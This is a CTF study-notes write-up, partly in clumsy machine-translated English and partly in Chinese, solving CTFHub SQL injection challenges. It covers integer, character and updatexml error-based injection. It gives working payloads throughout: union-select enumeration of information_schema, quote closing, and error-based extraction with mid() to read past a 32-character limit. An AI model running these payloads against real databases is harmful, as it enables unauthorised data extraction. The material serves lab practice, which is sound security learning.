CTFHub Web theme study notes (SQL injection problem solution writeup)

SQL injection problem in the Web

1, integer injection

 

 

 

 Use burpsuite,? Id = 1% 20and% 201 = 1

 

 Id = 1 data still appears, to prove the existence integer injection

Conventional practice, to see the number of fields, echo location

?id=1%20order%20by%202

The number of fields 2

 

 ?id=1%20and%201=2%20union%20select%201,2

 

 1 and 2 are echoing the position, name look-up table

?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables%20where%20table_schema=database()

 

 See two tables, continue to check the contents of the flag field inside

?id=1%20and%201=2%20union%20select%20group_concat(column_name),2%20from%20information_schema.columns%20where%20table_name=%27flag%27

Flag table flag field exists inside

 

 ?id=1%20and%201=2%20union%20select%20group_concat(flag),2%20from%20flag

Gets flag

 

 

 

2. char injection

 

 

 

 After entering 1 you can see the SQL statement displayed is the result of our input and single quotes wrapped

?id=1' and 1=1--+

 

 You can see the successful closing of single quotes, with almost before the next injection

The payload is the last

?id=1' and 1=2 union select group_concat(flag),2 from flag--+

 

 Obtaining flag, with the injection character numeric difference lies in the closed injection quotes

 

3, error injection

 

 Injection is being given to us to get the information we need out of the feedback error

Here we use updataxml function error injection

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
第三个参数：new_value，String格式，替换查找到的符合条件的数据
作用：改变文档中符合条件的节点的值　　

举一个payload：

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

　　

updatexml的报错原因很简单，updatexml第二个参数需要的是Xpath格式的字符串，但是我们第二个参数很明显不是，而是我们想要获得的数据，所以会报错，并且在报错的时候会将其内容显示出来，从而获得我们想要的数据

?id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

 

 我们接着注入即可，查询flag的payload为：

?id=1 and (updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1));

因为前面两道题都是flag字段，所以这次我直接猜了

 

 但是xpath报错只显示32位结果，很明显显示的flag不完全，我们需要借助mid函数来进行字符截取从而显示32位以后的数据。

?id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));

 

 

 

 获得剩下的数据，拿到flag

做会leetcode再更新